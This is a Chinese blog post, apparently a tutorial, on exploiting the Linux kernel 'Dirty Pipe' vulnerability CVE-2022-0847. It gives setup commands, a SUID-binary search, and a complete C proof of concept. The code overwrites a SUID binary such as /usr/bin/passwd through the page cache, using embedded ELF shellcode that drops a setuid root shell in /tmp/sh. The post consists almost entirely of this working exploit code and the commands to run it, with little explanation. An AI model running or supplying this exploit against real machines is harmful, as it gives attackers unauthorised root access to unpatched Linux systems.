• linux内核漏洞(CVE-2022-0847)

    目录

    1.打开kali,新建用户

    2.将用户添加到sudoers文件夹中

    3.编译a.c

    4.找一个具有SUID权限的可执行文件,进行提权

    5.执行poc提权

    1.打开kali,新建用户

    useradd test1 -p 123456 -d /home/test1 -s /bin/bash

    2.将用户添加到sudoers文件夹中

    vim /etc/sudoers

    在user privilege 处将test1用户添加进root用户后面

    3.编译a.c

    1. #define _GNU_SOURCE
    2. #include 
    3. #include 
    4. #include 
    5. #include 
    6. #include 
    7. #include 
    8. #include 
    9. #include 
    10. #ifndef PAGE_SIZE
    11. #define PAGE_SIZE 4096
    12. #endif
    13. // small (linux x86_64) ELF file matroshka doll that does;
    14. //   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
    15. //   write(fd, elfcode, elfcode_len)
    16. //   chmod("/tmp/sh", 04755)
    17. //   close(fd);
    18. //   exit(0);
    19. //
    20. // the dropped ELF simply does:
    21. //   setuid(0);
    22. //   setgid(0);
    23. //   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
    24. unsigned char elfcode[] = {
    25.   /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
    26.   0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    27.   0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    28.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    29.   0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
    30.   0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
    31.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    32.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    33.   0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
    34.   0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    35.   0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
    36.   0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
    37.   0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
    38.   0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
    39.   0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
    40.   0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
    41.   0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
    42.   0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
    43.   0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
    44.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
    45.   0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
    46.   0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    47.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
    48.   0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
    49.   0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    50.   0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
    51.   0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    52.   0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
    53.   0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
    54.   0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
    55.   0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
    56.   0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
    57.   0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
    58.   0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
    59. };
    60. /**
    61.  * Create a pipe where all "bufs" on the pipe_inode_info ring have the
    62.  * PIPE_BUF_FLAG_CAN_MERGE flag set.
    63.  */
    64. static void prepare_pipe(int p[2])
    65. {
    66.   if (pipe(p)) abort();
    67.   const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    68.   static char buffer[4096];
    69.   /* fill the pipe completely; each pipe_buffer will now have
    70.      the PIPE_BUF_FLAG_CAN_MERGE flag */
    71.   for (unsigned r = pipe_size; r > 0;) {
    72.     unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    73.     write(p[1], buffer, n);
    74.     r -= n;
    75.   }
    76.   /* drain the pipe, freeing all pipe_buffer instances (but
    77.      leaving the flags initialized) */
    78.   for (unsigned r = pipe_size; r > 0;) {
    79.     unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    80.     read(p[0], buffer, n);
    81.     r -= n;
    82.   }
    83.   /* the pipe is now empty, and if somebody adds a new
    84.      pipe_buffer without initializing its "flags", the buffer
    85.      will be mergeable */
    86. }
    87. int hax(char *filename, long offset, uint8_t *data, size_t len) {
    88.   /* open the input file and validate the specified offset */
    89.   const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
    90.   if (fd < 0) {
    91.     perror("open failed");
    92.     return -1;
    93.   }
    94.   struct stat st;
    95.   if (fstat(fd, &st)) {
    96.     perror("stat failed");
    97.     return -1;
    98.   }
    99.   /* create the pipe with all flags initialized with
    100.      PIPE_BUF_FLAG_CAN_MERGE */
    101.   int p[2];
    102.   prepare_pipe(p);
    103.   /* splice one byte from before the specified offset into the
    104.      pipe; this will add a reference to the page cache, but
    105.      since copy_page_to_iter_pipe() does not initialize the
    106.      "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    107.   --offset;
    108.   ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    109.   if (nbytes < 0) {
    110.     perror("splice failed");
    111.     return -1;
    112.   }
    113.   if (nbytes == 0) {
    114.     fprintf(stderr, "short splice\n");
    115.     return -1;
    116.   }
    117.   /* the following write will not create a new pipe_buffer, but
    118.      will instead write into the page cache, because of the
    119.      PIPE_BUF_FLAG_CAN_MERGE flag */
    120.   nbytes = write(p[1], data, len);
    121.   if (nbytes < 0) {
    122.     perror("write failed");
    123.     return -1;
    124.   }
    125.   if ((size_t)nbytes < len) {
    126.     fprintf(stderr, "short write\n");
    127.     return -1;
    128.   }
    129.   close(fd);
    130.   return 0;
    131. }
    132. int main(int argc, char **argv) {
    133.   if (argc != 2) {
    134.     fprintf(stderr, "Usage: %s SUID\n", argv[0]);
    135.     return EXIT_FAILURE;
    136.   }
    137.   char *path = argv[1];
    138.   uint8_t *data = elfcode;
    139.   int fd = open(path, O_RDONLY);
    140.   uint8_t *orig_bytes = malloc(sizeof(elfcode));
    141.   lseek(fd, 1, SEEK_SET);
    142.   read(fd, orig_bytes, sizeof(elfcode));
    143.   close(fd);
    144.   printf("[+] hijacking suid binary..\n");
    145.   if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
    146.     printf("[~] failed\n");
    147.     return EXIT_FAILURE;
    148.   }
    149.   printf("[+] dropping suid shell..\n");
    150.   system(path);
    151.   printf("[+] restoring suid binary..\n");
    152.   if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
    153.     printf("[~] failed\n");
    154.     return EXIT_FAILURE;
    155.   }
    156.   printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
    157.   system("/tmp/sh");
    158.   return EXIT_SUCCESS;
    159. }

    gcc a.c -o poc

    4.找一个具有SUID权限的可执行文件,进行提权

    find / -user root -perm /4000 2>/dev/null

    5.执行poc提权

    ./poc /usr/bin/passwd

  • 相关阅读:
    搭建自己的文件服务器
    基于SSM的宿舍财产管理系统【数据库设计、源码、开题报告】
    C++ 函数模板
    论文解读(SAGPool)《Self-Attention Graph Pooling》
    MyBatis的映射器语法
    Spring Boot整合Spring mvc(文件上传/拦截器)
    详解RISC v中断
    c++ 结构体
    .net------文件和流I/O
    Dubbo学习
  • 原文地址:https://blog.csdn.net/lyshark_lyshark/article/details/126799249